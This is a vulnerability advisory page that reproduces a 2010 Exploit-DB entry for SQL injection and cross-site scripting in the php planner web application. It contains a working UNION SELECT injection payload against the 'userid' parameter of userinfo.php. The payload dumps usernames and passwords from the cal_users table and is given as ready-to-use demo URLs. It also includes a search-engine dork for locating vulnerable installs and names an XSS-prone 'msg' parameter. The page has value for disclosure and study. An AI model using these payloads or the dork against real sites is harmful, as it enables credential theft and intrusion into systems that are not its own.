phpplanner XSS / SQL Vulnerability

vendor:

php planner

by:

anT!-Tr0J4n

7,5

CVSS

HIGH

XSS/SQL Injection

89, 79

CWE

Product Name: php planner

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7/Linux

2010

phpplanner XSS / SQL Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. The malicious query can be sent via the 'userid' parameter in the 'userinfo.php' page. An attacker can also exploit this vulnerability by sending a malicious XSS payload to the vulnerable application. The malicious payload can be sent via the 'msg' parameter in the 'notice.php' page.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Output encoding should be used to prevent XSS attacks.

Source

Exploit-DB raw data:

==================================
phpplanner XSS / SQL Vulnerability
==================================

# Script: php planner
# Date: 12-06-2010
# Author: anT!-Tr0J4n
#My Home : www.Dev-PoinT.com
# Software Link:http://phpplanner.sourceforge.net/
# Tested on: Win7/Linux
#DorK : inurl:/phpplanner/userinfo.php?userid=
-----------------------------------
Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/Coffin Of Evil/HoBeeZ/mahmoudvip/Mr.Mh$TEr / M [Zero] /Cyber-Err0r/
R3d-D3v1l (ALL sEc-r1z crEw) / saLman EL anz33 /NASHY / MR.FaHeD /EnerGiZeR/MiZR /almoomia/Nasraoui sameim && All Muslim's

========== Exploit By anT!-Tr0J4n============

[>] exploit -> phpplanner SQL Vulnerability

http://127.0.0.1/phpplanner/userinfo.php?userid=[sql]

[>] Poc

+union+select+concat(username,0x3a,password),2,3,4,5,6+from%20cal_users

[>] Live D3MO:

http://server/calendar/userinfo.php?userid=-3+union+select+concat%28username,0x3a,password%29,2,3,4,5,6+from%20cal_users

http://server/phpplanner/userinfo.php?userid=-3+union+select+username,2,3,4,password,6+from%20cal_users

#########################################

[>] exploit -> XSS Vulnerability

http://127.0.0.1/phpplanner/notice.php?msg=[XSS]

http://server/path/notice.php?msg=


===============ABDO-R3ZK==================

MY HomE : www.Dev-PoinT.com
Author : anT!-Tr0J4n
EmaiL : D3v-PoinT@Hotmail.com & C1EH@Hotmail.com
# ./Done .
===============ABDO-R3ZK==================